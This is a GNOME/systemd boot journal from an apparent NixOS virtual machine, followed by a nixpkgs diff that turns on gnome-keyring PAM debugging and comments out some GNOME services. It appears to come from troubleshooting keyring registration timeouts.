machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App15 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App15
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App3 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App3
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App6 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App6
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App9 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App9
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App10 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: WARNING: Application 'gnome-keyring-ssh.desktop' failed to register before timeout
machine # Aug 02 11:51:06 machine systemd[995]: Started GNOME Session Manager (session: gnome).
machine # ░░ Subject: A start job for unit UNIT has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit UNIT has finished successfully.
machine # ░░
machine # ░░ The job identifier is 18.
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App10
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App13 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App13
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App16 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App16
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App4 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App4
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App7 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App7
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: starting app '/org/gnome/SessionManager/App24'
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): Starting app: /org/gnome/SessionManager/App24
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmAutostartApp: starting xdg-user-dirs.desktop: command=xdg-user-dirs-update startup-id=1051489d99d487bf871722599376245700000010760023
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: WARNING: Application 'gnome-keyring-pkcs11.desktop' failed to register before timeout
machine # Aug 02 11:51:06 machine systemd[995]: Reached target GNOME Session Manager is ready.
machine # ░░ Subject: A start job for unit UNIT has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit UNIT has finished successfully.
machine # ░░
machine # ░░ The job identifier is 23.
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: ending phase PRE_DISPLAY_SERVER
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: starting phase DISPLAY_SERVER
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App1 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App1
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: ending phase DISPLAY_SERVER
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: starting phase INITIALIZATION
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App12 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App12
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App15 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App15
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App3 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App3
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App6 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App6
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App9 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App9
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App10 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App10
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App13 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App13
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App16 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App16
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App4 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App4
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App7 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App7
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: starting app '/org/gnome/SessionManager/App24'
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): Starting app: /org/gnome/SessionManager/App24
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): GsmAutostartApp: starting xdg-user-dirs.desktop: command=xdg-user-dirs-update startup-id=1051489d99d487bf871722599376245700000010760023
machine # Aug 02 11:51:06 machine systemd[995]: Starting GNOME Shell on Wayland...
machine # ░░ Subject: A start job for unit UNIT has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit UNIT has begun execution.
machine # ░░
machine # ░░ The job identifier is 34.
machine # Aug 02 11:51:06 machine systemd[995]: GNOME Shell on X11 was skipped because of an unmet condition check (ConditionEnvironment=XDG_SESSION_TYPE=x11).
machine # ░░ Subject: A start job for unit UNIT has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit UNIT has finished successfully.
machine # ░░
machine # ░░ The job identifier is 36.
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmAutostartApp: started pid:1463
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App11 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App11
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App14 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App14
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App2 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App2
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App17 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App17
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): GsmAutostartApp: started pid:1463
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App11 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App11
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App14 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App14
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App2 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App2
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App17 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App17
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App5 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App5
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App33
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App8 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App8
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App32 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App32
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App5 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App5
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App33
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App8 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App8
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App32 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App32
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: GnomeDesktop-DEBUG(+): Created transient scope for PID 1463
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: GnomeDesktop-DEBUG(+): Created transient scope for PID 1463
machine # Aug 02 11:51:06 machine systemd[995]: Started Application launched by gnome-session-binary.
machine # ░░ Subject: A start job for unit UNIT has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit UNIT has finished successfully.
machine # ░░
machine # ░░ The job identifier is 117.
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmAutostartApp: (pid:1463) done (status:0)
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): GsmAutostartApp: (pid:1463) done (status:0)
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): App xdg-user-dirs.desktop exited successfully
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: ending phase INITIALIZATION
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): App xdg-user-dirs.desktop exited successfully
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: ending phase INITIALIZATION
machine # Aug 02 11:51:06 machine dbus-daemon[1031]: [session uid=1000 pid=1031] Activating via systemd: service name='org.gtk.vfs.Daemon' unit='gvfs-daemon.service' requested by ':1.9' (uid=1000 pid=1462 comm="/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-" label="kernel")
machine # Aug 02 11:51:06 machine systemd[995]: Starting Virtual filesystem service...
machine # ░░ Subject: A start job for unit UNIT has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit UNIT has begun execution.
machine # ░░
machine # ░░ The job identifier is 121.
machine # Aug 02 11:51:06 machine dbus-daemon[1031]: [session uid=1000 pid=1031] Successfully activated service 'org.gtk.vfs.Daemon'
machine # Aug 02 11:51:06 machine systemd[995]: Started Virtual filesystem service.
machine # ░░ Subject: A start job for unit UNIT has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit UNIT has finished successfully.
machine # ░░
machine # ░░ The job identifier is 121.
machine # Aug 02 11:51:07 machine .gnome-shell-wr[1462]: Running GNOME Shell (using mutter 46.3.1) as a Wayland display server
machine # Aug 02 11:51:07 machine dbus-daemon[747]: [system] Activating via systemd: service name='org.freedesktop.RealtimeKit1' unit='rtkit-daemon.service' requested by ':1.20' (uid=1000 pid=1462 comm="/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-" label="kernel")
machine # Aug 02 11:51:07 machine systemd[1]: Starting RealtimeKit Scheduling Policy Service...
machine # ░░ Subject: A start job for unit rtkit-daemon.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit rtkit-daemon.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 702.
machine # Aug 02 11:51:07 machine gnome-shell[1462]: pci id for fd 12: 1234:1111, driver (null)
machine # Aug 02 11:51:07 machine gnome-shell[1462]: MESA-LOADER: failed to open bochs-drm: /run/opengl-driver/lib/dri/bochs-drm_dri.so: cannot open shared object file: No such file or directory (search paths /run/opengl-driver/lib/dri, suffix _dri)
machine # Aug 02 11:51:07 machine dbus-daemon[747]: [system] Successfully activated service 'org.freedesktop.RealtimeKit1'
machine # Aug 02 11:51:07 machine systemd[1]: Started RealtimeKit Scheduling Policy Service.
machine # ░░ Subject: A start job for unit rtkit-daemon.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit rtkit-daemon.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 702.
machine # Aug 02 11:51:07 machine rtkit-daemon[1493]: Successfully made thread 1492 of process 1462 owned by '1000' RT at priority 20.
machine # Aug 02 11:51:07 machine .gnome-shell-wr[1462]: Made thread 'KMS thread' realtime scheduled
machine # Aug 02 11:51:07 machine .gnome-shell-wr[1462]: Added device '/dev/dri/card0' (bochs-drm) using atomic mode setting.
machine # Aug 02 11:51:07 machine .gnome-shell-wr[1462]: Failed to initialize accelerated iGPU/dGPU framebuffer sharing: Not hardware accelerated
machine # Aug 02 11:51:07 machine .gnome-shell-wr[1462]: Created gbm renderer for '/dev/dri/card0'
machine # Aug 02 11:51:07 machine .gnome-shell-wr[1462]: Boot VGA GPU /dev/dri/card0 selected as primary
machine # Aug 02 11:51:07 machine dbus-daemon[1031]: [session uid=1000 pid=1031] Activating via systemd: service name='org.a11y.Bus' unit='at-spi-dbus-bus.service' requested by ':1.12' (uid=1000 pid=1462 comm="/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-" label="kernel")
machine # Aug 02 11:51:07 machine systemd[995]: Starting Accessibility services bus...
machine # ░░ Subject: A start job for unit UNIT has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit UNIT has begun execution.
machine # ░░
machine # ░░ The job identifier is 132.
machine # Aug 02 11:51:07 machine dbus-daemon[1031]: [session uid=1000 pid=1031] Successfully activated service 'org.a11y.Bus'
machine # Aug 02 11:51:07 machine systemd[995]: Started Accessibility services bus.
machine # ░░ Subject: A start job for unit UNIT has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit UNIT has finished successfully.
machine # ░░
machine # ░░ The job identifier is 132.
machine # Aug 02 11:51:07 machine .gnome-shell-wr[1462]: Using public X11 display :0, (using :1 for managed services)
machine # Aug 02 11:51:07 machine .gnome-shell-wr[1462]: Using Wayland display name 'wayland-0'
machine # Aug 02 11:51:07 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: RegisterClient
machine # Aug 02 11:51:07 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: RegisterClient
machine # Aug 02 11:51:07 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: Adding new client 1051489d99d487bf87172259946789277900000010760058 to session
machine # Aug 02 11:51:07 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: Adding new client 1051489d99d487bf87172259946789277900000010760058 to session
machine # Aug 02 11:51:07 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): uid = 1000
machine # Aug 02 11:51:07 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): pid = 1503
machine # Aug 02 11:51:07 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): exporting client to object path: /org/gnome/SessionManager/Client1
machine # Aug 02 11:51:07 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): exporting dbus client to object path: /org/gnome/SessionManager/Client1
machine # Aug 02 11:51:07 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/Client1 to store
machine # Aug 02 11:51:07 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: Client added: /org/gnome/SessionManager/Client1
machine # Aug 02 11:51:07 machine gnome-session-binary[1076]: DEBUG(+): uid = 1000
machine # Aug 02 11:51:07 machine gnome-session-binary[1076]: DEBUG(+): pid = 1503
machine # Aug 02 11:51:07 machine gnome-session-binary[1076]: DEBUG(+): exporting client to object path: /org/gnome/SessionManager/Client1
machine # Aug 02 11:51:07 machine gnome-session-binary[1076]: DEBUG(+): exporting dbus client to object path: /org/gnome/SessionManager/Client1
machine # Aug 02 11:51:07 machine gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/Client1 to store
machine # Aug 02 11:51:07 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: Client added: /org/gnome/SessionManager/Client1
machine # Aug 02 11:51:08 machine at-spi-bus-launcher[1509]: dbus-daemon[1509]: Activating service name='org.a11y.atspi.Registry' requested by ':1.0' (uid=1000 pid=1462 comm="/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-" label="kernel")
machine # Aug 02 11:51:08 machine dbus-daemon[747]: [system] Activating via systemd: service name='org.freedesktop.ColorManager' unit='colord.service' requested by ':1.20' (uid=1000 pid=1462 comm="/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-" label="kernel")
machine # Aug 02 11:51:08 machine systemd[1]: Starting Manage, Install and Generate Color Profiles...
machine # ░░ Subject: A start job for unit colord.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit colord.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 779.
machine # Aug 02 11:51:08 machine at-spi-bus-launcher[1509]: dbus-daemon[1509]: Successfully activated service 'org.a11y.atspi.Registry'
machine # Aug 02 11:51:08 machine at-spi-bus-launcher[1512]: SpiRegistry daemon is running with well-known name - org.a11y.atspi.Registry
machine # Aug 02 11:51:08 machine dbus-daemon[747]: [system] Successfully activated service 'org.freedesktop.ColorManager'
machine # Aug 02 11:51:08 machine systemd[1]: Started Manage, Install and Generate Color Profiles.
machine # ░░ Subject: A start job for unit colord.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit colord.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 779.
machine # Aug 02 11:51:08 machine su[1534]: Successful su for alice by root
machine # Aug 02 11:51:08 machine su[1534]: pam_unix(su:session): session opened for user alice(uid=1000) by (uid=0)
machine # Aug 02 11:51:08 machine su[1534]: pam_unix(su:session): session closed for user alice
machine # Aug 02 11:51:10 machine .gnome-shell-wr[1462]: Unset XDG_SESSION_ID, getCurrentSessionProxy() called outside a user session. Asking logind directly.
machine # Aug 02 11:51:10 machine .gnome-shell-wr[1462]: Will monitor session 1
diff --git a/nixos/modules/security/pam.nix b/nixos/modules/security/pam.nix
index 672c86c5b073..99b556929e8b 100644
--- a/nixos/modules/security/pam.nix
+++ b/nixos/modules/security/pam.nix
@@ -726,7 +726,9 @@ let
disable_interactive = true;
}; }
{ name = "kwallet"; enable = cfg.kwallet.enable; control = "optional"; modulePath = "${cfg.kwallet.package}/lib/security/pam_kwallet5.so"; }
- { name = "gnome_keyring"; enable = cfg.enableGnomeKeyring; control = "optional"; modulePath = "${pkgs.gnome-keyring}/lib/security/pam_gnome_keyring.so"; }
+ { name = "gnome_keyring"; enable = cfg.enableGnomeKeyring; control = "optional"; modulePath = "${pkgs.gnome-keyring.override { enableDev = true; }}/lib/security/pam_gnome_keyring.so"; settings = {
+ debug = true;
+ }; }
{ name = "intune"; enable = config.services.intune.enable; control = "optional"; modulePath = "${pkgs.intune-portal}/lib/security/pam_intune.so"; }
{ name = "gnupg"; enable = cfg.gnupg.enable; control = "optional"; modulePath = "${pkgs.pam_gnupg}/lib/security/pam_gnupg.so"; settings = {
store-only = cfg.gnupg.storeOnly;
@@ -792,8 +794,9 @@ let
{ name = "krb5"; enable = config.security.pam.krb5.enable; control = "sufficient"; modulePath = "${pam_krb5}/lib/security/pam_krb5.so"; settings = {
use_first_pass = true;
}; }
- { name = "gnome_keyring"; enable = cfg.enableGnomeKeyring; control = "optional"; modulePath = "${pkgs.gnome-keyring}/lib/security/pam_gnome_keyring.so"; settings = {
+ { name = "gnome_keyring"; enable = cfg.enableGnomeKeyring; control = "optional"; modulePath = "${pkgs.gnome-keyring.override { enableDev = true; }}/lib/security/pam_gnome_keyring.so"; settings = {
use_authtok = true;
+ debug = true;
}; }
];
@@ -861,8 +864,9 @@ let
debug = true;
}; }
{ name = "kwallet"; enable = cfg.kwallet.enable; control = "optional"; modulePath = "${cfg.kwallet.package}/lib/security/pam_kwallet5.so"; }
- { name = "gnome_keyring"; enable = cfg.enableGnomeKeyring; control = "optional"; modulePath = "${pkgs.gnome-keyring}/lib/security/pam_gnome_keyring.so"; settings = {
+ { name = "gnome_keyring"; enable = cfg.enableGnomeKeyring; control = "optional"; modulePath = "${pkgs.gnome-keyring.override { enableDev = true; }}/lib/security/pam_gnome_keyring.so"; settings = {
auto_start = true;
+ debug = true;
}; }
{ name = "gnupg"; enable = cfg.gnupg.enable; control = "optional"; modulePath = "${pkgs.pam_gnupg}/lib/security/pam_gnupg.so"; settings = {
no-autostart = cfg.gnupg.noAutostart;
diff --git a/nixos/modules/services/desktops/gnome/gnome-keyring.nix b/nixos/modules/services/desktops/gnome/gnome-keyring.nix
index 550c6ba8eff5..4ec87f2f12e6 100644
--- a/nixos/modules/services/desktops/gnome/gnome-keyring.nix
+++ b/nixos/modules/services/desktops/gnome/gnome-keyring.nix
@@ -8,6 +8,7 @@
}:
let
cfg = config.services.gnome.gnome-keyring;
+ package = pkgs.gnome-keyring.override { enableDev = true; };
in
{
@@ -26,14 +27,14 @@ in
};
config = lib.mkIf cfg.enable {
- environment.systemPackages = [ pkgs.gnome-keyring ];
+ environment.systemPackages = [ package ];
services.dbus.packages = [
- pkgs.gnome-keyring
+ package
pkgs.gcr
];
- xdg.portal.extraPortals = [ pkgs.gnome-keyring ];
+ xdg.portal.extraPortals = [ package ];
security.pam.services.login.enableGnomeKeyring = true;
@@ -41,7 +42,7 @@ in
owner = "root";
group = "root";
capabilities = "cap_ipc_lock=ep";
- source = "${pkgs.gnome-keyring}/bin/gnome-keyring-daemon";
+ source = "${package}/bin/gnome-keyring-daemon";
};
};
}
diff --git a/nixos/modules/services/x11/desktop-managers/gnome.nix b/nixos/modules/services/x11/desktop-managers/gnome.nix
index 11d5fcbfee23..29eda07d0642 100644
--- a/nixos/modules/services/x11/desktop-managers/gnome.nix
+++ b/nixos/modules/services/x11/desktop-managers/gnome.nix
@@ -259,17 +259,17 @@ in
programs.dconf.enable = true;
security.polkit.enable = true;
services.accounts-daemon.enable = true;
- services.dleyna-renderer.enable = mkDefault true;
- services.dleyna-server.enable = mkDefault true;
- services.power-profiles-daemon.enable = mkDefault true;
+ # services.dleyna-renderer.enable = mkDefault true;
+ # services.dleyna-server.enable = mkDefault true;
+ # services.power-profiles-daemon.enable = mkDefault true;
services.gnome.at-spi2-core.enable = true;
- services.gnome.evolution-data-server.enable = true;
+ # services.gnome.evolution-data-server.enable = true;
services.gnome.gnome-keyring.enable = true;
- services.gnome.gnome-online-accounts.enable = mkDefault true;
- services.gnome.gnome-online-miners.enable = true;
- services.gnome.tracker-miners.enable = mkDefault true;
- services.gnome.tracker.enable = mkDefault true;
- services.hardware.bolt.enable = mkDefault true;
+ # services.gnome.gnome-online-accounts.enable = mkDefault true;
